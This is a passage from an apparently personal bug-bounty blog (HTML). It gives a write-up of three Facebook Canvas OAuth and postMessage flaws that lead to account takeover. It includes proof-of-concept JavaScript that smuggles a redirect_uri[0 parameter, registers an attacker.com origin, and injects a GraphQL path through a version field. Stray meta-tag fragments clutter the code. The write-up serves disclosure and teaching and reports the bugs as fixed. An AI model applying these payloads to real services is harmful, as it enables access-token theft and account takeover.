3) Set <strong>redirect_uri[0</strong> in <strong>params</strong> as an additional parameter ( order matters so it must be after <strong>redirect_uri</strong> ) to be <strong>https://www.instagram.com/accounts/signup</strong>/ which is a valid redirect_uri for the Instagram applicaiton.<br />
The URL of the POST request end up being something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">https</span><span class="p">:</span><span class="c1">//apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&amp;display=async&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&amp;app_id=124024574287414&amp;client_id=124024574287414&amp;response_type=token&amp;redirect_uri[0=https://www.instagram.com/accounts/signup/</span>
</code></pre></div></div>

<p>The request would end up being successful and returning a first party access token since <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;redirect_uri[0 replaces redirect_uri and it’s a valid redirect_uri. In the client side though, the logic is if an access_token was received it means that the origin used to construct the redirect_uri did work with the app_id and for that it should trust it and use to send the message to the iframe, behind the scenes though redirect_uri[0 was used and not redirect_uri ( Cool right?)</p>

<p><strong>Proof of concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://attacker.com/callback</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">124024574287414</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;124024574287414</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri[0</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://www.instagram.com/accounts/signup/</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>

<p><strong>Bug 2: Why bothering, Origin is undefined</strong></p>

<p>The main problem for this one is that /dialog/oauth endpoint would accept <strong>https://www.facebook.com/dialog/return/arbiter</strong> as a valid redirect_uri ( without a valid origin in the fragment part ) for third-party applications and some first-party ones.<br />
The second problem is that this behaviour to occur ( no origin in the fragment part ), the message sent from the iframe to <strong>apps.facebook.com</strong> should not contain a.data.origin ( <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> is undefined ) , however this same value would be used later to send a cross window message to the iframe, if <strong>null</strong> or <strong>undefined</strong> is used, the message won’t be received. <br />
Likely, i noticed that <strong>JSONRPC</strong> function would always receive a not null origin of the postMessage ( Line 55 ) . Since b.origin is undefined or null, <strong>k</strong> would be chosen. <strong>k</strong> could be set by the attacker by first registering a valid origin via <strong>c(“Arbiter”).subscribe(“XdArbiter/register”)</strong> which could be informed if our message had <strong>xdArbiterRegister</strong> and a specified origin . Before “<strong>k</strong>” variable is set, the supplied origin would be checked first if it belongs to the attacker application using “<strong>/platform/app_owned_url_check/</strong>” endpoint.<br />
This is wrong and the second problem occurs here since we can’t ensure that the user in the next cross origin message sent from the iframe would supply the same <strong>APP_ID</strong>.</p>

<p>Not all first-party applications are vulnerable to this though. I used the Facebook Watch for Android application or Portal to get a first party access_token.</p>

<p>The URL of the POST request would be something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;https:/</span><span class="o">/</span><span class="nx">apps</span><span class="p">.</span><span class="nx">facebook</span><span class="p">.</span><span class="nx">com</span><span class="o">/</span><span class="nx">dialog</span><span class="o">/</span><span class="nx">oauth</span><span class="p">?</span><span class="nx">state</span><span class="o">=</span><span class="nx">f36be3f648ddfb</span><span class="o">&amp;</span><span class="nx">display</span><span class="o">=</span><span class="k">async</span><span class="o">&amp;</span><span class="nx">redirect_uri</span><span class="o">=&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;https:/</span><span class="o">/</span><span class="nx">www</span><span class="p">.</span><span class="nx">facebook</span><span class="p">.</span><span class="nx">com</span><span class="o">/</span><span class="nx">dialog</span><span class="o">/</span><span class="k">return</span><span class="sr">/arbiter&amp;app_id=&lt;meta content="text/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390&amp;client_id=&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390&amp;response_type=token
</span></code></pre></div></div>

<p><strong>Proof Of Concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">({</span><span class="na">xdArbiterRegister</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">origin</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">},</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">)</span>

<span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">1348564698517390</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;1348564698517390</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>

<p><strong>Bug 3</strong>: <strong>Total</strong> <strong>Chaos</strong>, <strong>version can’t be harmful</strong></p>

<p>This bug one occurs in <strong>PlatformDialogClient.getURI</strong> function which is responsible of setting the API version before /dialog/oauth endpoint. This function didn’t check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request ( Line 86 ).<br />
The <strong>version</strong> property in <strong>params</strong> passed in the cross window message sent to <strong>apps.facebook.com</strong> could be set to <strong>api/graphql/?doc_id=DOC_ID&amp;variables=VAR#</strong> and would eventually lead to a POST request sent to the GraphQL endpoint with valid user CSRF token.</p>

<p><strong>DOC_ID</strong> and <strong>VAR</strong> could be set to an id of a GraphQL Mutation to add a phone number to the attacount, and the variables of this mutation.</p>

<p>The URL of the POST request would be something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">https</span><span class="p">:</span><span class="c1">//apps.facebook.com/api/graphql?doc_id=DOC_ID&amp;variables=VAR&amp;?/dialog/oauth&amp;state=f36be3f648ddfb&amp;display=async&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&amp;app_id=1348564698517390&amp;client_id=1348564698517390&amp;response_type=token</span>
</code></pre></div></div>

<p><strong>Proof Of Concept</strong></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;xmsg = JSON.stringify</span><span class="se">(</span><span class="sr">{"jsonrpc":"2.0"</span><span class="err">,
</span>                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">version</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;api/graphql?doc_id=DOC_ID&amp;variables=VAR&amp;</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">xmsg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://attacker.com</span><span class="dl">"</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>

<p><strong>Timeline</strong></p>

<ol>
  <li>Aug 4, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 4, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 6, 2021— Fixed by Facebook<br />
 Sep 2, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
  <li>Aug 9, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 9, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 12, 2021— Fixed by Facebook<br />
 Aug 31, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
  <li>Aug 12, 2021— Report Sent
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 13, 2021— Acknowledged by Facebook</p>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" />
    <p>&lt;/meta&gt;Aug 17, 2021— Fixed by Facebook<br />
 Sep 2, 2021 — $42000 bounty awarded by Facebook.</p>
  </li>
</ol>

  </div><a class="u-url" href="/2021/09/03/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
